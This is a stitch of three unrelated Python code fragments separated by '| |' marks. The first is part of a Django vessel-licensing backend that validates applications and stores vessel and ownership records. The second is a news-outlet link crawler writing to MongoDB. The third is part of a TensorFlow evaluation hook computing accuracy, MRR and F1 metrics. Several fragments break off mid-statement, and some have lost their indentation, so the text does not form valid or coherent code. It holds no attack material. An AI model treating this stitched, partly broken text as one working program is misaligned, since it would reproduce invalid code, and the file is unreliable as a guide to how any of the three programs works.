    for proposal in proposals:
        if type(proposal) == WaitingListApplication and proposal.processing_status not in ['approved', 'declined', 'discarded']:
            proposals_wla.append(proposal)
        if type(proposal) == MooringLicenceApplication and proposal.processing_status not in ['approved', 'declined', 'discarded']:
            proposals_mla.append(proposal)
        if type(proposal) == AnnualAdmissionApplication and proposal.processing_status not in ['approved', 'declined', 'discarded']:
            proposals_aaa.append(proposal)
        if type(proposal) == AuthorisedUserApplication and proposal.processing_status not in ['approved', 'declined', 'discarded']:
            proposals_aua.append(proposal)
    # bucket live approvals by type; *_sus variants also count suspended ones
    for approval in approvals:
        if type(approval) == WaitingListAllocation and approval.status == 'current':
            approvals_wla.append(approval)
        if type(approval) == MooringLicence and approval.status == 'current':
            approvals_ml.append(approval)
        if type(approval) == MooringLicence and approval.status in ['current', 'suspended']:
            approvals_ml_sus.append(approval)
        if type(approval) == AnnualAdmissionPermit and approval.status == 'current':
            approvals_aap.append(approval)
        if type(approval) == AuthorisedUserPermit and approval.status == 'current':
            approvals_aup.append(approval)
        if type(approval) == AuthorisedUserPermit and approval.status in ['current', 'suspended']:
            approvals_aup_sus.append(approval)
    # apply rules
    if (type(instance.child_obj) == WaitingListApplication and (proposals_wla or approvals_wla or
            proposals_mla or approvals_ml_sus)):
        association_fail = True
    # Person can have only one WLA, Waiting List application, Mooring Licence and Mooring Licence application
    elif (type(instance.child_obj) == WaitingListApplication and (
            WaitingListApplication.objects.filter(submitter=instance.submitter).exclude(processing_status__in=['approved', 'declined', 'discarded']).exclude(id=instance.id) or
            WaitingListAllocation.objects.filter(submitter=instance.submitter).exclude(status__in=['cancelled', 'expired', 'surrendered']).exclude(approval=instance.approval) or
            MooringLicenceApplication.objects.filter(submitter=instance.submitter).exclude(processing_status__in=['approved', 'declined', 'discarded']) or
            MooringLicence.objects.filter(submitter=instance.submitter).filter(status__in=['current', 'suspended']))
            ):
        raise serializers.ValidationError("Person can have only one WLA, Waiting List application, Mooring Licence and Mooring Licence application")
    elif (type(instance.child_obj) == AnnualAdmissionApplication and (proposals_aaa or approvals_aap or
            proposals_aua or approvals_aup_sus or proposals_mla or approvals_ml_sus)):
        association_fail = True
    elif type(instance.child_obj) == AuthorisedUserApplication and (proposals_aua or approvals_aup):
        association_fail = True
    elif type(instance.child_obj) == MooringLicenceApplication and (proposals_mla or approvals_ml):
        association_fail = True
    if association_fail:
        raise serializers.ValidationError("This vessel is already part of another application/permit/licence")
    ## vessel ownership cannot be greater than 100%
    ownership_percentage_validation(vessel_ownership)
def store_vessel_data(request, vessel_data):
    """Get-or-create the Vessel for vessel_data['rego_no'] and persist its details.

    If any incoming detail differs from the latest stored VesselDetails a new
    record is created (preserving history); otherwise the existing record is
    updated in place.

    Args:
        request: current HTTP request (unused here, kept for interface parity
            with the sibling store_* helpers).
        vessel_data: dict with 'rego_no' and a 'vessel_details' sub-dict.

    Returns:
        (vessel, vessel_details) tuple of the persisted model instances.

    Raises:
        serializers.ValidationError: when the rego number or vessel details
            are missing, or the details fail serializer validation.
    """
    if not vessel_data.get('rego_no'):
        raise serializers.ValidationError({"Missing information": "You must supply a Vessel Registration Number"})
    # normalise the rego so vessels differing only by case/spacing dedupe
    rego_no = vessel_data.get('rego_no').replace(" ", "").strip().lower()
    vessel, created = Vessel.objects.get_or_create(rego_no=rego_no)
    vessel_details_data = vessel_data.get("vessel_details")
    if vessel_details_data is None:
        # previously this fell through to a TypeError; fail with a clear 400
        raise serializers.ValidationError({"Missing information": "You must supply the vessel details"})
    # serializer expects the FK as a pk
    vessel_details_data["vessel"] = vessel.id
    ## Vessel Details
    existing_vessel_details = vessel.latest_vessel_details
    ## we no longer use a read_only flag, so must compare incoming data to existing
    existing_vessel_details_data = VesselDetailsSerializer(existing_vessel_details).data
    create_vessel_details = False
    for key in existing_vessel_details_data.keys():
        if key in vessel_details_data and existing_vessel_details_data[key] != vessel_details_data[key]:
            create_vessel_details = True
            logger.debug("vessel details changed for %s: %r -> %r",
                         key, existing_vessel_details_data[key], vessel_details_data[key])
    if create_vessel_details:
        # details changed: write a fresh VesselDetails record
        serializer = SaveVesselDetailsSerializer(data=vessel_details_data)
    else:
        # unchanged: update the existing record in place
        serializer = SaveVesselDetailsSerializer(existing_vessel_details, vessel_details_data)
    serializer.is_valid(raise_exception=True)
    vessel_details = serializer.save()
    return vessel, vessel_details
def store_vessel_ownership(request, vessel, instance=None):
    """Create/update the VesselOwnership (and any CompanyOwnership) rows
    linking the requesting user to *vessel*.

    Args:
        request: current HTTP request; the raw 'vessel_ownership' payload is
            re-read from request.data (see note below) and request.user
            becomes the Owner.
        vessel: the Vessel model instance being registered.
        instance: optional Proposal; when given it becomes the company
            ownership's blocking_proposal and receives any uploaded
            registration documents.

    Returns:
        the saved VesselOwnership instance.

    Raises:
        serializers.ValidationError: on missing owner selection, missing
            company name, failed serializer validation, or missing vessel
            registration papers for company-owned vessels.
    """
    ## Get Vessel
    ## we cannot use vessel_data, because this dict has been modified in store_vessel_data()
    vessel_ownership_data = deepcopy(request.data.get('vessel').get("vessel_ownership"))
    if vessel_ownership_data.get('individual_owner') is None:
        raise serializers.ValidationError({"Missing information": "You must select a Vessel Owner"})
    elif (not vessel_ownership_data.get('individual_owner') and not
            vessel_ownership_data.get("company_ownership", {}).get("company", {}).get("name")
            ):
        raise serializers.ValidationError({"Missing information": "You must supply the company name"})
    company_ownership = None
    company = None
    if not vessel_ownership_data.get('individual_owner'):
        ## Company
        company_name = vessel_ownership_data.get("company_ownership").get("company").get("name")
        company, created = Company.objects.get_or_create(name=company_name)
        ## CompanyOwnership
        company_ownership_data = vessel_ownership_data.get("company_ownership")
        company_ownership_set = CompanyOwnership.objects.filter(
                company=company,
                vessel=vessel,
                )
        ## Do we need to create a new CO record?
        create_company_ownership = False
        edit_company_ownership = True
        # prefer an existing draft record; fall back to the approved one and
        # create a new record only if the incoming data differs from it
        if company_ownership_set.filter(status="draft"):
            company_ownership = company_ownership_set.filter(status="draft")[0]
            ## cannot edit draft record with blocking_proposal
            if company_ownership.blocking_proposal:
                edit_company_ownership = False
        elif company_ownership_set.filter(status="approved"):
            company_ownership = company_ownership_set.filter(status="approved")[0]
            existing_company_ownership_data = CompanyOwnershipSerializer(company_ownership).data
            for key in existing_company_ownership_data.keys():
                if key in company_ownership_data and existing_company_ownership_data[key] != company_ownership_data[key]:
                    create_company_ownership = True
                    print(existing_company_ownership_data[key])
                    print(company_ownership_data[key])
        else:
            # no draft or approved record exists yet
            create_company_ownership = True
        # update company key from dict to pk
        company_ownership_data.update({"company": company.id})
        # add vessel to company_ownership_data
        company_ownership_data.update({"vessel": vessel.id})
        if create_company_ownership:
            serializer = SaveCompanyOwnershipSerializer(data=company_ownership_data)
            serializer.is_valid(raise_exception=True)
            company_ownership = serializer.save()
        elif edit_company_ownership:
            serializer = SaveCompanyOwnershipSerializer(company_ownership, company_ownership_data)
            serializer.is_valid(raise_exception=True)
            company_ownership = serializer.save()
        # NOTE(review): if neither branch runs (blocked draft) the stale
        # company_ownership record is used unchanged — confirm intended.
    ## add to vessel_ownership_data
    if company_ownership and company_ownership.id:
        vessel_ownership_data['company_ownership'] = company_ownership.id
        if instance:
            ## set blocking_proposal
            company_ownership.blocking_proposal = instance
            company_ownership.save()
    else:
        vessel_ownership_data['company_ownership'] = None
    vessel_ownership_data['vessel'] = vessel.id
    owner, created = Owner.objects.get_or_create(emailuser=request.user)
    vessel_ownership_data['owner'] = owner.id
    # one VesselOwnership per (owner, vessel, company_ownership) triple
    vessel_ownership, created = VesselOwnership.objects.get_or_create(
            owner=owner,
            vessel=vessel,
            company_ownership=company_ownership
            )
    serializer = SaveVesselOwnershipSerializer(vessel_ownership, vessel_ownership_data)
    serializer.is_valid(raise_exception=True)
    vessel_ownership = serializer.save()
    # check and set blocking_owner
    if instance:
        vessel.check_blocking_ownership(vessel_ownership, instance)
    # save temp doc if exists
    if request.data.get('proposal', {}).get('temporary_document_collection_id'):
        handle_document(instance, vessel_ownership, request.data)
    # Vessel docs
    if vessel_ownership.company_ownership and not vessel_ownership.vessel_registration_documents.all():
        raise serializers.ValidationError({"Vessel Registration Papers": "Please attach"})
    return vessel_ownership
def handle_document(instance, vessel_ownership, request_data, *args, **kwargs):
    """Attach uploaded registration documents to *vessel_ownership*.

    Moves every document out of the TemporaryDocumentCollection referenced by
    request_data['proposal']['temporary_document_collection_id'], deletes the
    temporary collection, and clears the id from *instance*.

    No-op when no collection id is supplied or the collection does not exist.
    """
    logger.debug("handle document")
    temporary_document_collection_id = request_data.get('proposal', {}).get('temporary_document_collection_id')
    if not temporary_document_collection_id:
        return
    # .first() avoids evaluating the queryset twice (exists + index)
    temp_doc_collection = TemporaryDocumentCollection.objects.filter(
        id=temporary_document_collection_id).first()
    if temp_doc_collection:
        for doc in temp_doc_collection.documents.all():
            save_vessel_registration_document_obj(vessel_ownership, doc)
        temp_doc_collection.delete()
        instance.temporary_document_collection_id = None
        instance.save()
def ownership_percentage_validation(vessel_ownership):
individual_ownership_id = None
company_ownership_id = None
min_percent_fail = False
vessel_ownership_percentage = 0
## First ensure applicable % >= 25
if hasattr(vessel_ownership.company_ownership, 'id'):
company_ownership_id = vessel_ownership.company_ownership.id
if not vessel_ownership.company_ownership.percentage:
raise serializers.ValidationError({
"Ownership Percentage": "You must specify a percentage"
})
else:
if vessel_ownership.company_ownership.percentage < 25:
min_percent_fail = True
else:
vessel_ownership_percentage = vessel_ownership.company_ownership.percentage
elif not vessel_ownership.percentage:
raise serializers.ValidationError({
"Ownership Percentage": "You must specify a percentage"
})
else:
individual_ownership_id = vessel_ownership.id
if vessel_ownership.percentage < 25:
min_percent_fail = True
else:
vessel_ownership_percentage = vessel_ownership.percentage
if min_percent_fail:
raise | |
#!/usr/bin/python3.5
"""Crawler that maps outbound links between known news-outlet websites.

Reads database and crawl settings from config.ini and stores internal
(per-site) and external (site-to-site) links in MongoDB.
"""
from time import time
from datetime import datetime
import requests
import logging
import coloredlogs
from bs4 import BeautifulSoup
# import tldextract
from urllib.parse import urljoin # , urlparse
from tld import get_tld
from pytrie import StringTrie
from multiprocessing import Pool # processes
import configparser
conf = configparser.ConfigParser()
conf.optionxform = str # stop confparser from lowercasing option names
conf.read('config.ini')
# print(conf['database']['filename'])
from pymongo import MongoClient
# create a user-agent string with contact info (sent with every request)
headers = {}
for key in conf['user-agent-string']:
    headers[key] = conf['user-agent-string'][key]
# List of exceptions from config where lowercasing found urls is ok and right
lower_ok = [n.strip() for n in
            conf['allow_lowercase']['lowercase_ok'].split(",")]
# set up logging
logger = logging.getLogger("GeoNewsNet")
# NOTE(review): 'format' shadows the builtin of the same name
format = "%(asctime)s [%(levelname)s] [%(filename)s:%(lineno)s] %(message)s"
# CRITICAL 50, ERROR 40, WARNING 30, INFO 20, DEBUG 10
# logging.basicConfig(level=logging.DEBUG, format=format)
coloredlogs.install(level=logging.DEBUG, fmt=format) # , format=format
# hush requests' own (noisy) logging
logging.getLogger("requests").setLevel(logging.WARNING)
class LinksExtractor:
    """Extract and store the link graph rooted at one known news outlet.

    Given a site url, crawls pages, records links to other domains
    (``db.external``) and internal links (``db.internal_links``), so the
    frequency of links out to each domain can be derived later.
    """
    def __init__(self, url, n_levels_deep=1,
                 is_composite=False):
        """Set up state and mongo connections for one site.

        Args:
            url: the site's entry url (also used to resolve relative links).
            n_levels_deep: how many rounds of internal links to follow.
            is_composite: True when the site shares a registered domain with
                other studied outlets (sub-sites of one publisher), in which
                case internal/external is decided via a prefix tree.
        """
        logger.info("init Class with '{}'".format(url))
        self.site = url
        self.full_domain = get_tld(url) # top level domain
        self.links_out = []
        self.internal_links = []
        self.n_levels_deep = n_levels_deep
        self.is_composite = is_composite
        self.domains_we_study = StringTrie() # prefix tree
        # set up mongodb
        self.client = MongoClient(conf['database']['path'],
                                  int(conf['database']['port']))
        self.db = self.client[conf['database']['mongo_db']]
        self.scraped = [] # init this with stuff from db
        # resume support: urls already scraped for this domain in earlier runs
        add_previously_scraped = self.db.internal_links.find({
            "link_base_domain": self.full_domain
        }, {"link": 1})
        for doc in add_previously_scraped:
            self.scraped.append(doc['link'])
        # and a trie (prefix tree) https://pythonhosted.org/PyTrie/
        # to hold the domains we care about
        # http://stackoverflow.com/a/5435784/357387
        scope = self.db.newsNetActors.find({}, {"url": 1})
        for doc in scope:
            self.domains_we_study[doc['url']] = doc['url']
    def is_composite_actor(self, tld_url):
        """Return True if *tld_url* belongs to a composite actor.

        An actor is composite when its newsNetActors record has
        is_comp_site != "no" — presumably a "yes"/"no"-style flag; verify
        against the collection's schema.
        """
        if self.db.newsNetActors.find({
            "registered_domain": tld_url,
            "is_comp_site": {
                "$ne": "no"
            }
        }).count() == 0: # 0 means not composite
            return False
        else:
            return True
    def has_class_but_no_id(self, tag):
        """BeautifulSoup filter: tags carrying a class attribute but no id."""
        return tag.has_attr('class') and not tag.has_attr('id')
    def save_url_to_db(self, url, l, l_tld):
        """Record one found link for a non-composite site.

        Args:
            url: the page the link was found on.
            l: the link target.
            l_tld: the target's top level domain.
        """
        # split intern & extern by comparing top level domains
        if self.full_domain == l_tld:
            # internal - just append to list
            if l not in self.internal_links:
                self.internal_links.append(l)
        else:
            # external links - save appropriately to db
            if l not in self.links_out:
                self.links_out.append(l)
            # figure out if target is composite; if so, attribute the link to
            # the specific studied sub-site rather than the registered domain
            if self.is_composite_actor(l_tld):
                try:
                    l_tld = self.domains_we_study.longest_prefix(l)
                except:
                    # no studied prefix matches; keep the plain tld
                    pass
            # print("l:", l, "l_tdl", l_tld)
            doc_external = {
                "from_url": url,
                "from_base_url": self.full_domain,
                "to_url": l,
                "to_base_url": l_tld,
                "found_date": datetime.now()
            }
            # upsert keyed on (from_url, to_url): only the first sighting of
            # a pair is stored (NOTE(review): collection.update is deprecated
            # in modern pymongo — update_one is the current API)
            condit = {"from_url": url, "to_url": l}
            self.db.external.update(condit,
                                    {"$setOnInsert": doc_external},
                                    upsert=True)
    def save_composite_url_to_db(self, url, l, l_tld):
        '''If the url is from a composite newssite, we use a prefixtree
        to decide if a url is internal or external
        url = the url from where we found a link
        l = the url to where we found a link
        l_tld = base_url of found link (top level domain)
        '''
        # see if the target exists in the prefixtree
        try:
            p_base = self.domains_we_study.longest_prefix(l)
        except:
            # no studied site prefixes this link
            p_base = None
        # if we found a longest prefix AND this the site we
        # examine right nows' url is in this base (actually equals.)
        if p_base and self.site == p_base:
            internal = True
        else:
            internal = False
        if internal:
            # store it for later iterations
            if l not in self.internal_links:
                self.internal_links.append(l)
        else:
            # external
            if l not in self.links_out:
                self.links_out.append(l)
            # figure out if target is composite
            # set l_tld to longest prefix if possible.
            if self.is_composite_actor(l_tld):
                try:
                    l_tld = self.domains_we_study.longest_prefix(l)
                except:
                    pass
            doc_external = {
                "from_url": url,
                "from_base_url": self.site,
                "to_url": l,
                "to_base_url": l_tld,
                "found_date": datetime.now()
            }
            # upsert keyed on (from_url, to_url); first sighting wins
            condit = {"from_url": url, "to_url": l}
            self.db.external.update(condit,
                                    {"$setOnInsert": doc_external},
                                    upsert=True)
    def filter_links(self, link):
        '''BeautifulSoup tag filter: keep only followable <a href> links.

        Drops non-http schemes, fragments, template placeholders and direct
        file downloads. http://stackoverflow.com/a/28905106/357387
        '''
        href = link and link.get('href')
        if href:
            return all([
                link,
                link.name == 'a',
                href,
                not link.has_attr('no_track'),
                not href.startswith(("mailto", "ftp", "tlf", "tel", "javasc",
                                     "sms", "//", "avisa@", "redaksjonen@",
                                     '#', "webcal")),
                '{' not in href,
                not href.endswith((".jpg", ".pdf", ".doc", ".xls", "jpeg",
                                   ".png", ".mov"))
            ])
        else:
            # logger.info("this link is no good: {}".format(link))
            return False
    def get_links(self, url):
        """Fetch *url*, record it as scraped, and save every followable link.

        Side effects: appends to self.scraped / self.internal_links /
        self.links_out and writes to the internal_links and external
        mongo collections.
        """
        # store url as scraped
        self.scraped.append(url)
        # check if it is in db
        if not self.db.internal_links.find({'link': url}).count() > 0:
            # if not, insert new scraped url
            # get link_base_domain correct for composite sites...
            temp_tld = get_tld(url)
            # perhaps redundant, but do a check if this url is a composite
            # site in the actors collections
            if self.is_composite_actor(temp_tld):
                try:
                    temp_tld = self.domains_we_study.longest_prefix(url)
                except:
                    pass
            # print("url, temp_tld, l:237", url, temp_tld)
            # insert internal
            doc_internal = {
                "scraped": True,
                "link": url,
                "link_base_domain": temp_tld,
                "found": datetime.now()
            }
            self.db.internal_links.insert_one(doc_internal)
        # this try except should be rewritten,
        # there are more exceptions than you might think.
        # only accept ok status, skip all others.
        try:
            r = requests.get(url, headers=headers)
        except (requests.exceptions.ConnectionError,
                requests.exceptions.TooManyRedirects,
                requests.exceptions.InvalidSchema,
                requests.exceptions.ChunkedEncodingError,
                requests.exceptions.ContentDecodingError,
                requests.exceptions.ReadTimeout): # as e
            logger.debug("""Url dos not exist? (or too many redirects)
                or invalid schema, or ChunkedEncodingError++
                on {}""".format(url),
                exc_info=True)
            return
        if r.status_code == requests.codes.ok:
            try:
                soup = BeautifulSoup(r.text, 'lxml') # html.parser
            except:
                logger.debug("content not html? {}".format(url))
                return
            # logger.debug(soup)
            # use the filters - get links from where we are now.
            for link in soup.find_all(self.filter_links):
                l = link.get('href')
                # logger.debug(l)
                # fix internal to full length urls
                if not l.lower().startswith(("http://", "https://")):
                    l = urljoin(self.site, l)
                    # print("now its", l)
                # fix backwards errors from ystadsallehanda.se
                if l.lower().startswith("http://http://"):
                    l = l[7:]
                try:
                    l_tld = get_tld(l)
                except:
                    logger.info("at {} can't find tld for {}".format(url, l))
                    continue
                if len(l_tld) == 0:
                    l = urljoin(self.site, l)
                    l_tld = get_tld(l)
                    logger.debug("joined relative url {}".format(l))
                # NB: http://sn.dk/Naestved does not register any a-tags,
                # even if the soup object does contain 'em. (ugly fix added)
                if any(exc in l for exc in lower_ok):
                    l = l.lower()
                    l_tld = get_tld(l)
                    # logger.debug("exception! url .lower(): {}".format(l))
                if l in self.scraped: # "already scraped"
                    continue
                if self.is_composite:
                    self.save_composite_url_to_db(url, l, l_tld)
                else:
                    # from_url, to_url + tld
                    self.save_url_to_db(url, l, l_tld)
                # logger.debug(l)
        else:
            logger.debug("Status '{}' not ok: {}".format(r.status_code, url))
def scrape(url_tuple):
    """Scrape one site, following internal links for the configured depth.

    Args:
        url_tuple: (url, is_composite) pair, as produced by collect_data().
    """
    start_url, composite = url_tuple
    extractor = LinksExtractor(start_url,
                               n_levels_deep=int(conf['search-depth']['depth']),  # noqa
                               is_composite=composite)
    extractor.get_links(start_url)
    # breadth-first expansion, one round per depth level
    # (simpler version of http://stackoverflow.com/q/12484113/357387)
    for level in range(extractor.n_levels_deep):
        candidates = list({u for u in extractor.internal_links
                           if u not in extractor.scraped})
        # dont bother if we have no new candidates this round
        if candidates:
            logger.debug("* Round: {} with {} candidate urls"
                         .format(level + 1, len(candidates)))
            for candidate in candidates:
                extractor.get_links(candidate)
    logger.debug("{} N out-lenks found - {}"
                 .format(start_url, len(extractor.links_out)))
    logger.debug("{} N scraped antall - {}"
                 .format(start_url, len(extractor.scraped)))
    logger.debug("{} N intrnal - {}"
                 .format(start_url, len(extractor.internal_links)))
    remaining = sum(1 for u in extractor.internal_links
                    if u not in extractor.scraped)
    logger.debug("{} N new links we can (could have) follow(ed): {}"
                 .format(start_url, remaining))
def collect_data():
    """Load every news-net actor from mongo and scrape them in parallel."""
    client = MongoClient(conf['database']['path'],
                         int(conf['database']['port']))
    db = client[conf['database']['mongo_db']]
    jobs = []
    for document in db.newsNetActors.find():  # .limit(5)
        is_composite = document['is_comp_site'].strip() != 'no'
        jobs.append((document['url'], is_composite))
    # reverse order
    jobs.reverse()
    logger.debug("Got the sites to scrape {} stk, lets go..!"
                 .format(len(jobs)))
    # parallelize across worker processes
    # http://chriskiehl.com/article/parallelism-in-one-line/
    # from multiprocessing.dummy import Pool as ThreadPool # threads
    pool = Pool(24)  # ThreadPool(24)
    pool.map(scrape, jobs)
    pool.close()
    pool.join()
    logger.debug("function collect_data finnished peacefully")
def collect_data_fill_potential_holes(n=10):
"""148 sites had less than 100 internal, 100 had less than 10
and are probably technical errors that needs to be fixed, hence
this function. n=10 by default, but 100 seems more reasonable"""
# connect
client = MongoClient(conf['database']['path'],
int(conf['database']['port']))
db = client[conf['database']['mongo_db']]
cursor = db.newsNetActors.find()
# build the list of all sites
all_sites = []
for document in cursor:
advanced = True if document['is_comp_site'].strip() != 'no' else False
all_sites.append((document['url'], advanced,
document['registered_domain']))
# get the number of each site scraped urls (not inlcuding 0 scraped)
cur = db.internal_links.aggregate([
{"$group": {"_id": "$link_base_domain", "count": {"$sum": 1}}},
{"$sort": {"count": 1}}
])
all_in_db = {} # if we have 0 in db, we need to know and add later
for c in cur:
all_in_db[c["_id"]] = c['count']
rescrape_these = []
for u in all_sites:
test = u[2]
if (u[1] is True):
test = u[0]
# find how many we have on this or 0 if not found
if(all_in_db.get(test, 0) < n):
# tuple (url.com, True)
rescrape_these.append((u[0], u[1]))
logger.debug("rescrape {} items".format(len(rescrape_these)))
# then | |
shape (batch_size, num_candidates), in which each prediction is a
num_candidates-long binary vector (with 0 or more 1's and the rest 0).
(num_candidates may vary over batches; in that case the metrics macro- microP/R/F1 are not available,
but Acc and MRR are)
target:
binary targets; either for each instance as index of correct answer (if unique),
or as binary vectors (with 0 or more 1's for correct answers), similar to predict.
at_every_epoch:
evaluated each at_every_epoch epochs. Note that calling EvalHook requires loss-argument to be 0,
as automatically done post-epoch in jtr.sisyphos.train, hence always called after finishing the epoch.
placeholders:
placeholders, in case batches does not generate feed_dicts.
metrics: list with metrics;
default: [], which will return all available metrics (dep. on type of problem)
Options are currently:
'Acc', 'MRR', 'microP', 'microR', 'microF1', 'macroP', 'macroR', 'macroF1', 'precision', 'recall', 'F1'.
Note: mostly not all the metrics are available, but deciding on sensible metrics is left to the user;
E.g.: if the number of candidates remains constant, micro- and macro-metrics will be returned,
even if the 'labels' for the actual candidates vary over instances.
summary_writer:
optional summary_writer; if set, each (epoch,metric) will be written by the summary_writer, with
label `msg+"_"+metric` (e.g. "development_microF1")
print_details:
if True, prints for each instance:
target, prediction, logits, and whether the prediction is entirely correct
write_metrics_to (filepath):
Write metrics to the given file. If empty no metrics will be
written to disk.
print_to:
if a filename is specified, appends the details per instance (as for print_details) to that file.
msg:
print this message before the evaluation metrics; useful to distinguish between calls of en EvalHook on train/dev/test data.
"""
super(EvalHook, self).__init__(summary_writer)
self.batches = batches
self.logits = logits
self.predict = predict
self.target = target
self.at_every_epoch = at_every_epoch
self.placeholders = placeholders
#self.done_for_epoch = False
self.iter = 0
self.print_details = print_details
self.print_to = print_to
self.info = info
self.metrics = metrics
self.write_metrics_to = write_metrics_to# + '_' + info
def _calc_mrr(self, scores, targets):
#todo: verify!
assert scores.shape == targets.shape #targets must be array with binary vector per instance (row)
rrs = []
for score, target in zip(scores, targets):
order = score.argsort()[::-1] #sorted id's for highest to lost score
#refIDs = np.where(target==1)
refIDs = [i for i,t in enumerate(target) if t == 1]
for i in range(len(order)):
rank = i+1
if order[i] in refIDs: #rank of first relevant answer
break
rrs.append(1./rank)
return rrs
def _calc_micro_PRF(self, binary_predictions, binary_targets):
#todo: verify!
predict_complement = np.add(1.0, -binary_predictions)
target_complement = np.add(1.0, -binary_targets)
tp = np.sum(np.multiply(binary_predictions, binary_targets)) # p = 1, t = 1
fp = np.sum(np.multiply(binary_predictions, target_complement)) # p = 1, t = 0
fn = np.sum(np.multiply(predict_complement, binary_targets)) # p = 0, t = 1
microp = tp / (tp + fp) if tp > 0 else 0.0
micror = tp / (tp + fn) if tp > 0 else 0.0
microf1 = 2. * microp * micror / (microp + micror) if (microp * micror > 0) else 0.0
return microp, micror, microf1
def _calc_macro_PRF(self, binary_predictions, binary_targets):
"""
first dimension of input arguments: instances; 2nd dimension: different labels
(returns None when only 1 label dimension is given)
"""
#todo: verify!
predict_complement = np.add(1.0, -binary_predictions)
target_complement = np.add(1.0, -binary_targets)
tp = np.sum(np.multiply(binary_predictions, binary_targets), axis=0) # p = 1, t = 1
fp = np.sum(np.multiply(binary_predictions, target_complement), axis=0) # p = 1, t = 0
fn = np.sum(np.multiply(predict_complement, binary_targets), axis=0) # p = 0, t = 1
inds_tp0 = np.where(tp!=0)
r = np.zeros(np.shape(tp))
r[inds_tp0] = np.divide(tp[inds_tp0], tp[inds_tp0] + fn[inds_tp0])
p = np.zeros(np.shape(tp))
p[inds_tp0] = np.divide(tp[inds_tp0], tp[inds_tp0] + fp[inds_tp0])
inds_pr0 = np.where(np.multiply(p,r)!=0)
f1 = np.zeros(np.shape(tp))
f1[inds_pr0] = 2.*np.divide(np.multiply(p[inds_pr0], r[inds_pr0]), np.add(p[inds_pr0], r[inds_pr0]))
macrop = np.mean(p)
macror = np.mean(r)
macrof1 = np.mean(f1)
return macrop, macror, macrof1
    def __call__(self, sess, epoch, model, loss, current_feed_dict=None):
        """
        Evaluate the model on `self.batches` and log/print the metrics.

        Runs `self.predict` and `self.logits` on every batch, accumulates
        exact-match accuracy, MRR (multi-class only) and micro/macro
        precision/recall/F1 where they can be computed, writes them to the
        summary writer and optionally appends them to `self.write_metrics_to`
        and the per-example report to `self.print_to`.

        Args:
            sess: TensorFlow session used to run the prediction ops.
            epoch: current epoch number (used for logging only).
            model: unused here; kept for the common hook signature.
            loss: unused here; kept for the common hook signature.
            current_feed_dict: unused here; kept for the common hook signature.

        Returns:
            (targets, predictions, metrics): concatenated gold labels,
            concatenated predictions, and a dict of the computed metrics.
        """
        self.iter += 1
        # Historic kwargs-based gating, kept for reference:
        #post_epoch = False if not 'post_epoch' in kwargs else kwargs['post_epoch']
        #if epoch % self.at_every_epoch != 0 or not post_epoch:
        #    return
        #if self.done_for_epoch == True:
        #    return
        #print("Evaluation: ", self.info)
        predictions, targets = None, None
        predictions_bin, targets_bin = None, None
        # one-hot encode a vector of class indices into shape (len(indices), n)
        convert2binary = lambda indices, n: np.asarray([[1 if j == i else 0 for j in range(n)] for i in indices])
        #initiate metrics
        rrs = []  # reciprocal ranks, for MRR
        total = 0
        correct = 0
        n = 0  # number of classes, taken from the latest batch's logits
        consistent = True  # False once binary vectors cannot be concatenated across batches
        for i, batch in enumerate(self.batches):
            if self.placeholders is not None:
                feed_dict = dict(zip(self.placeholders, batch))
            else:
                feed_dict = batch
            prediction = sess.run(self.predict, feed_dict=feed_dict)
            target = feed_dict[self.target]
            logits = sess.run(self.logits, feed_dict=feed_dict)
            n = logits.shape[-1] #may be variable per batch; may be 1 for binary problem
            #store evaluated forms (whether indices or binary vectors)
            predictions = prediction if predictions is None else np.concatenate([predictions, prediction], axis=0)
            targets = target if targets is None else np.concatenate([targets, target], axis=0)
            #create binary vectors (already binary if shaped like the logits)
            target_bin = target if target.shape == logits.shape else convert2binary(target, n)
            prediction_bin = prediction if prediction.shape == logits.shape else convert2binary(prediction, n)
            # exact-match test per example
            overlap = [np.asarray([p==t]).all() for p,t in zip(prediction_bin, target_bin)]
            correct += np.sum(overlap)
            total += prediction_bin.shape[0]
            if consistent:
                try:
                    predictions_bin = prediction_bin if predictions_bin is None else np.concatenate([predictions_bin, prediction_bin], axis=0)
                    targets_bin = target_bin if targets_bin is None else np.concatenate([targets_bin, target_bin], axis=0)
                #in case not compatible over different batches:
                except:
                    consistent = False
            if n > 1:
                rrs.extend(self._calc_mrr(logits, target_bin))
            #else: makes no sense to calculate MRR
            # per-batch human-readable report; the inner loop reuses `i`,
            # which is harmless because the outer `i` is not used afterwards
            report = ""
            for i in range(prediction_bin.shape[0]):
                is_correct = all(target_bin[i] == prediction_bin[i])
                report += 'target:%s\tprediction:%s\tlogits:%s\tcorrect:%s\n'\
                    %(str(target[i]), str(prediction[i]), str(logits[i]), is_correct)
                # alternative:
                # probs = sess.run(tf.nn.softmax(self.logits), feed_dict=feed_dict)
            if self.print_details:
                logger.info(report)
            if self.print_to != "":
                with open(self.print_to, "a") as myfile:
                    myfile.write(report)
        #calculate metrics:
        metrics = {}
        metrics['Acc'] = correct/float(total) if correct > 0 else 0.0
        if len(rrs) > 0:
            metrics['MRR'] = np.mean(rrs)
        if consistent:
            mp, mr, mf = self._calc_micro_PRF(predictions_bin, targets_bin)
            Mp, Mr, Mf = self._calc_macro_PRF(predictions_bin, targets_bin)
            if n > 1:
                metrics['microP'] = mp
                metrics['microR'] = mr
                metrics['microF1'] = mf
                metrics['macroP'] = Mp
                metrics['macroR'] = Mr
                metrics['macroF1'] = Mf
            elif n == 1:
                # binary problem: micro-averaged values are the plain P/R/F1
                metrics['Prec'] = mp
                metrics['Rec'] = mr
                metrics['F1'] = mf
        #output: print either all metrics or only the requested subset
        if len(self.metrics) == 0:
            printmetrics = sorted(metrics.keys())
        else:
            printmetrics = [m for m in self.metrics if m in metrics.keys()]
        res = "Epoch %d\tcorrect: %d/%d"%(epoch, correct, total)
        for m in printmetrics:
            #if len(printmetrics) > 2:
            #    res += '\n'
            res += '\t%s: %.3f'%(m, metrics[m])
            self.update_summary(sess, epoch, self.info+'_'+m, metrics[m])
            if self.write_metrics_to != '':
                with open(self.write_metrics_to, 'a') as f:
                    f.write("{0} {1} {2:.5}\n".format(datetime.now(), self.info+'_'+m,
                        np.round(metrics[m],5)))
        res += '\t(%s)'%self.info
        logger.info(res)
        #self.done_for_epoch = True
        return targets, predictions, metrics # return those so more they can be printed to file, etc
def at_epoch_end(self, sess, epoch, model, loss):
if epoch % self.at_every_epoch == 0:
self.__call__(sess, epoch, model, loss)
else:
return
def at_iteration_end(self, *args, **kwargs):
return
class PRF1Hook(Hook):
    """
    Evaluate and print per-class and average precision, recall, F1
    (via sklearn's `classification_report`).
    """
    def __init__(self, batcher, placeholders, at_every_epoch):
        """
        Args:
